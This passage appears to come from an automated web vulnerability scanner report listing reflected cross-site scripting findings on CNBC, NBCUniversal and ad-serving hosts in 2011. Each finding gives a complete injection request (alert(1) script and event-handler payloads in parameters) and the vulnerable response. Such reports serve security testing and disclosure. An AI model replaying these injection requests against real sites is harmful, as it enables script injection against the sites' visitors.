GET /jspix?anId=144&pubId=4749b063c"-alert(1)-"1e31f51b3df&campId=176996 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=15F3A88A83B937D289F19131BE7257D4; Path=/
Content-Type: text/javascript
Date: Tue, 06 Sep 2011 15:05:41 GMT
Connection: close

var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=144&pubId=4749b063c"-alert(1)-"1e31f51b3df&campId=176996",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   asid : "gsrdhvsx"
};

(function(){var N="3.12";var v=(adsafeVisParams.debug==="true");var n=2000;var H={INFO:"in
...[SNIP]...

3.64. http://quote.cnbc.com/quote-html-webservice/quote.htm [&symbols parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://quote.cnbc.com
Path:	/quote-html-webservice/quote.htm

Issue detail

The value of the &symbols request parameter is copied into the HTML document as plain text between tags. The payload 4f61d<img%20src%3da%20onerror%3dalert(1)>e62cc5d307c was submitted in the &symbols parameter. This input was echoed as 4f61d<img src=a onerror=alert(1)>e62cc5d307c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quote-html-webservice/quote.htm?&symbols=.GDAXI|4f61d<img%20src%3da%20onerror%3dalert(1)>e62cc5d307c&requestMethod=quick&noform=1&realtime=1&client=flexQuote&output=json&random=1315338996212 HTTP/1.1
Host: quote.cnbc.com
Proxy-Connection: keep-alive
Referer: http://quote.cnbc.com/quoteproxy.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; __qseg=Q_D; s_nr=1315338989816; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSearch%25257CNews%25257CAllT%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257B%252520cnbc_multionclick%252528%252527http%25253A//www.cnbc.com/%252527%252529%25253B%25257D%2526oidt%253D2%2526ot%253DDIV

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/x-json;charset=UTF-8
Content-Language: en-US
Date: Tue, 06 Sep 2011 14:57:30 GMT
Via: 1.1 C aicache6
Content-Length: 980
X-Aicache-OS: 64.210.195.136:80
Connection: Keep-Alive
Keep-Alive: max=20
Expires: Tue, 06 Sep 2011 14:57:35 GMT

{"QuickQuoteResult":{"QuickQuote":[{"change_pct":"-1.61","last":"5161.68","curmktstatus":"REG_MKT","change":"-84.50","reg_last_time":"2011-09-06T16:42:29.000+0200","timeZone":"ECT","last_time":"
...[SNIP]...
"false","altSymbol":"DAX-XE","volume":"189930268","todays_closing":"0.0","previous_day_closing":"5246.18","high":"5332.11","low":"5150.05","comments":"ILX","last_time_msec":"1315320149000"},{"symbol":"4F61D<IMG SRC=A ONERROR=ALERT(1)>E62CC5D307C","code":"1"}],"xmlns:xsi":"http://www.w3.org/2001/XMLSchema-instance","xmlns":"http://quote.cnbc.com/services/MultiQuote/2006"}}

3.65. http://search.cnbc.com/main.do [keywords parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://search.cnbc.com
Path:	/main.do

Issue detail

The value of the keywords request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4ae86</script><script>alert(1)</script>06ada94b268662ae5 was submitted in the keywords parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Request

GET /main.do?target=all&keywords=xss4ae86</script><script>alert(1)</script>06ada94b268662ae5&categories=exclude&searchboxinput=xss HTTP/1.1
Host: search.cnbc.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
Cache-Control: max-age=0
Origin: http://www.cnbc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; TZM=-300; adops_master_kvs=; snas_noinfo=1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1315339005443; __qseg=Q_D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:57:47 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Type: text/html
Via: 1.1 C aicache6
Content-Length: 84843
X-Aicache-OS: 64.210.194.245:80
Connection: close
Expires: Tue, 06 Sep 2011 15:07:47 GMT

<html>
<head>


<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta name="description" content="CNBC Search, xss4ae86</script>
...[SNIP]...
<script>

keyWordParam = "xss4ae86</script><script>alert(1)</script>06ada94b268662ae5";
keyWordParam = keyWordParam.replace(/"/g,'"');
document.getElementById('txtBox').value = keyWordParam;

</script>
...[SNIP]...

3.66. http://search.cnbc.com/main.do [keywords parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://search.cnbc.com
Path:	/main.do

Issue detail

The value of the keywords request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86fbc</script><script>alert(1)</script>0a30be6899a was submitted in the keywords parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /main.do?keywords=xss86fbc</script><script>alert(1)</script>0a30be6899a&sort=date&minimumrelevance=0.2&topics=slideshows&pubtime=0&pubfreq=h HTTP/1.1
Host: search.cnbc.com
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; TZM=-300; snas_noinfo=1; s_cc=true; adops_master_kvs=; __qseg=Q_D; s_nr=1315339031577; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSearch%25257CAll%25257CAllT%2526pidt%253D1%2526oid%253Djavascript%25253AloadParamURL%252528keyWordParam%25252C%252527date%252527%25252C0%25252C%252527h%252527%25252C%252527%252526topics%25253Dslideshows%252527%252529%25253B%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:57:51 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Type: text/html
Via: 1.1 C aicache6
Content-Length: 85231
X-Aicache-OS: 64.210.194.247:80
Connection: close
Expires: Tue, 06 Sep 2011 15:07:51 GMT

<html>
<head>


<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta name="description" content="CNBC Search, xss86fbc</script>
...[SNIP]...
<script>

keyWordParam = "xss86fbc</script><script>alert(1)</script>0a30be6899a";
keyWordParam = keyWordParam.replace(/"/g,'"');
document.getElementById('txtBox').value = keyWordParam;

</script>
...[SNIP]...

3.67. http://search.cnbc.com/main.do [keywords parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://search.cnbc.com
Path:	/main.do

Issue detail

The value of the keywords request parameter is copied into the HTML document as text between TITLE tags. The payload 8364e</title><script>alert(1)</script>07d9d84cea13b502c was submitted in the keywords parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /main.do?target=all&keywords=xss8364e</title><script>alert(1)</script>07d9d84cea13b502c&categories=exclude&searchboxinput=xss HTTP/1.1
Host: search.cnbc.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
Cache-Control: max-age=0
Origin: http://www.cnbc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; TZM=-300; adops_master_kvs=; snas_noinfo=1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1315339005443; __qseg=Q_D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:57:51 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Type: text/html
Via: 1.1 C aicache6
Content-Length: 84839
X-Aicache-OS: 64.210.193.97:80
Connection: close
Expires: Tue, 06 Sep 2011 15:07:51 GMT

<html>
<head>


<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta name="description" content="CNBC Search, xss8364e</title><
...[SNIP]...
<title>xss8364e</title><script>alert(1)</script>07d9d84cea13b502c - CNBC</title>
...[SNIP]...

3.68. http://search.cnbc.com/main.do [keywords parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://search.cnbc.com
Path:	/main.do

Issue detail

The value of the keywords request parameter is copied into the HTML document as text between TITLE tags. The payload fda4e</title><script>alert(1)</script>b2e6faa4271 was submitted in the keywords parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main.do?keywords=xssfda4e</title><script>alert(1)</script>b2e6faa4271&sort=date&minimumrelevance=0.2&topics=slideshows&pubtime=0&pubfreq=h HTTP/1.1
Host: search.cnbc.com
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; TZM=-300; snas_noinfo=1; s_cc=true; adops_master_kvs=; __qseg=Q_D; s_nr=1315339031577; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSearch%25257CAll%25257CAllT%2526pidt%253D1%2526oid%253Djavascript%25253AloadParamURL%252528keyWordParam%25252C%252527date%252527%25252C0%25252C%252527h%252527%25252C%252527%252526topics%25253Dslideshows%252527%252529%25253B%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:57:54 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Type: text/html
Via: 1.1 C aicache6
Content-Length: 85227
X-Aicache-OS: 64.210.194.245:80
Connection: close
Expires: Tue, 06 Sep 2011 15:07:54 GMT

<html>
<head>


<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta name="description" content="CNBC Search, xssfda4e</title><
...[SNIP]...
<title>xssfda4e</title><script>alert(1)</script>b2e6faa4271 - CNBC</title>
...[SNIP]...

3.69. http://search.cnbc.com/main.do [pubfreq parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://search.cnbc.com
Path:	/main.do

Issue detail

The value of the pubfreq request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8cf8c"><script>alert(1)</script>c96a087baf9 was submitted in the pubfreq parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main.do?keywords=xss&sort=date&minimumrelevance=0.2&topics=slideshows&pubtime=0&pubfreq=h8cf8c"><script>alert(1)</script>c96a087baf9 HTTP/1.1
Host: search.cnbc.com
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; TZM=-300; snas_noinfo=1; s_cc=true; adops_master_kvs=; __qseg=Q_D; s_nr=1315339031577; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSearch%25257CAll%25257CAllT%2526pidt%253D1%2526oid%253Djavascript%25253AloadParamURL%252528keyWordParam%25252C%252527date%252527%25252C0%25252C%252527h%252527%25252C%252527%252526topics%25253Dslideshows%252527%252529%25253B%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:57:59 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Type: text/html
Via: 1.1 C aicache6
Content-Length: 85676
X-Aicache-OS: 64.210.194.246:80
Connection: close
Expires: Tue, 06 Sep 2011 15:07:59 GMT

<html>
<head>


<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta name="description" content="CNBC Search, xss">
<meta name=
...[SNIP]...
e="keywords" type="text" style="width:100px" height="22px" class="search_input" onkeypress="javascript: return cnbc_searchbox_submitenter(document.getElementById('txtBox').value,'date',formatParam,0,'h8cf8c"><script>alert(1)</script>c96a087baf9',event);" maxlength="100"/>
...[SNIP]...

3.70. http://search.cnbc.com/main.do [pubfreq parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://search.cnbc.com
Path:	/main.do

Issue detail

The value of the pubfreq request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4f82d"%3balert(1)//40cf5dbf8a was submitted in the pubfreq parameter. This input was echoed as 4f82d";alert(1)//40cf5dbf8a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /main.do?keywords=xss&sort=date&minimumrelevance=0.2&topics=slideshows&pubtime=0&pubfreq=h4f82d"%3balert(1)//40cf5dbf8a HTTP/1.1
Host: search.cnbc.com
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; TZM=-300; snas_noinfo=1; s_cc=true; adops_master_kvs=; __qseg=Q_D; s_nr=1315339031577; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSearch%25257CAll%25257CAllT%2526pidt%253D1%2526oid%253Djavascript%25253AloadParamURL%252528keyWordParam%25252C%252527date%252527%25252C0%25252C%252527h%252527%25252C%252527%252526topics%25253Dslideshows%252527%252529%25253B%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:58:00 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Type: text/html
Via: 1.1 C aicache6
Content-Length: 85436
X-Aicache-OS: 64.210.194.247:80
Connection: close
Expires: Tue, 06 Sep 2011 15:08:00 GMT

<html>
<head>


<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta name="description" content="CNBC Search, xss">
<meta name=
...[SNIP]...
<script>
search_GetPagination_Clientside(0,search_PagLinks,linksdisplay,keyWordParam,1,"date",formatParam,0,"h4f82d";alert(1)//40cf5dbf8a");
display_searchPageResults(0,10,1,keyWordParam);
</script>
...[SNIP]...

3.71. http://search.cnbc.com/main.do [sort parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://search.cnbc.com
Path:	/main.do

Issue detail

The value of the sort request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa5fc"%3balert(1)//d4e309e7b5c was submitted in the sort parameter. This input was echoed as aa5fc";alert(1)//d4e309e7b5c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /main.do?keywords=xss&sort=dateaa5fc"%3balert(1)//d4e309e7b5c&minimumrelevance=0.2&topics=slideshows&pubtime=0&pubfreq=h HTTP/1.1
Host: search.cnbc.com
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; TZM=-300; snas_noinfo=1; s_cc=true; adops_master_kvs=; __qseg=Q_D; s_nr=1315339031577; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSearch%25257CAll%25257CAllT%2526pidt%253D1%2526oid%253Djavascript%25253AloadParamURL%252528keyWordParam%25252C%252527date%252527%25252C0%25252C%252527h%252527%25252C%252527%252526topics%25253Dslideshows%252527%252529%25253B%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:57:57 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Type: text/html
Via: 1.1 C aicache6
Content-Length: 85675
X-Aicache-OS: 64.210.194.247:80
Connection: close
Expires: Tue, 06 Sep 2011 15:07:57 GMT

<html>
<head>


<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta name="description" content="CNBC Search, xss">
<meta name=
...[SNIP]...
<script>
search_GetPagination_Clientside(0,search_PagLinks,linksdisplay,keyWordParam,1,"dateaa5fc";alert(1)//d4e309e7b5c",formatParam,0,"h");
display_searchPageResults(0,10,1,keyWordParam);
</script>
...[SNIP]...

3.72. http://search.cnbc.com/main.do [sort parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://search.cnbc.com
Path:	/main.do

Issue detail

The value of the sort request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87310"><script>alert(1)</script>44b2f4d8132 was submitted in the sort parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main.do?keywords=xss&sort=date87310"><script>alert(1)</script>44b2f4d8132&minimumrelevance=0.2&topics=slideshows&pubtime=0&pubfreq=h HTTP/1.1
Host: search.cnbc.com
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; TZM=-300; snas_noinfo=1; s_cc=true; adops_master_kvs=; __qseg=Q_D; s_nr=1315339031577; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSearch%25257CAll%25257CAllT%2526pidt%253D1%2526oid%253Djavascript%25253AloadParamURL%252528keyWordParam%25252C%252527date%252527%25252C0%25252C%252527h%252527%25252C%252527%252526topics%25253Dslideshows%252527%252529%25253B%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:57:55 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Type: text/html
Via: 1.1 C aicache6
Content-Length: 86020
X-Aicache-OS: 64.210.194.246:80
Connection: close
Expires: Tue, 06 Sep 2011 15:07:55 GMT

<html>
<head>


<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta name="description" content="CNBC Search, xss">
<meta name=
...[SNIP]...
ut id="txtBox" name="keywords" type="text" style="width:100px" height="22px" class="search_input" onkeypress="javascript: return cnbc_searchbox_submitenter(document.getElementById('txtBox').value,'date87310"><script>alert(1)</script>44b2f4d8132',formatParam,0,'h',event);" maxlength="100"/>
...[SNIP]...

3.73. http://serve.directdigitalllc.com/serve.php [click parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://serve.directdigitalllc.com
Path:	/serve.php

Issue detail

The value of the click request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7792f"><script>alert(1)</script>5f008c5eb4 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /serve.php?bid=26&t202id=35073&click=http://yads.zedo.com/ads2/c%3Fa=906408%3Bn=1197%3Bx=2304%3Bc=1197000038,1197000038%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=2%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=unknown%3Bp%3D6%3Bf%3D1087333%3Bh%3D840708%3Bk=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7863048=_4e66392c,0224774881,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=7863048/optn=64?trg=7792f"><script>alert(1)</script>5f008c5eb4 HTTP/1.1
Host: serve.directdigitalllc.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315340154901&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Tue, 06 Sep 2011 15:16:07 GMT
Server: Apache/2.2.16 (Amazon)
X-Powered-By: PHP/5.3.6
Connection: keep-alive
Content-Length: 9750

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<style>
/* begin reset */
html {margin:0;padding:0;border:0;}
body, div, span, object, ifram
...[SNIP]...
wn;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7863048=_4e66392c,0224774881,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=7863048/optn=64?trg=7792f"><script>alert(1)</script>5f008c5eb4https://crm.directdigitalllc.com/click?a=76&b=26&p=76%2C17%2C104&t=11">
...[SNIP]...

3.74. http://serve.directdigitalllc.com/serve.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://serve.directdigitalllc.com
Path:	/serve.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24c33"><script>alert(1)</script>ea769a6fa16 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /serve.php?bid=26&t202id=35073&click=http://yads.zedo.com/ads2/c%3Fa=906408%3Bn=1197%3Bx=2304%3Bc=1197000038,1197000038%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=2%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=unknown%3Bp%3D6%3Bf%3D1087333%3Bh%3D840708%3Bk=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7863048=_4e66392c,0224774881,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=7863048/optn=64?/24c33"><script>alert(1)</script>ea769a6fa16trg= HTTP/1.1
Host: serve.directdigitalllc.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315340154901&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Tue, 06 Sep 2011 15:16:07 GMT
Server: Apache/2.2.16 (Amazon)
X-Powered-By: PHP/5.3.6
Connection: keep-alive
Content-Length: 9778

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<style>
/* begin reset */
html {margin:0;padding:0;border:0;}
body, div, span, object, ifram
...[SNIP]...
known;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7863048=_4e66392c,0224774881,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=7863048/optn=64?/24c33"><script>alert(1)</script>ea769a6fa16trg=https://crm.directdigitalllc.com/click?a=76&b=26&p=76%2C104%2C125&t=11">
...[SNIP]...

3.75. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://snas.nbcuni.com
Path:	/snas/api/getRemoteDomainCookies

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 26c64<script>alert(1)</script>321541649f9 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /snas/api/getRemoteDomainCookies?callback=__nbcsnasadops.doSCallback26c64<script>alert(1)</script>321541649f9 HTTP/1.1
Host: snas.nbcuni.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
Cookie: s_nr=1313446468300; s_vi=[CS]v1|2724CD10851D0ED3-4000012BE00065E8[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:00:47 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b DAV/2 mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=10
Expires: Tue, 06 Sep 2011 15:00:57 GMT
Content-Length: 208
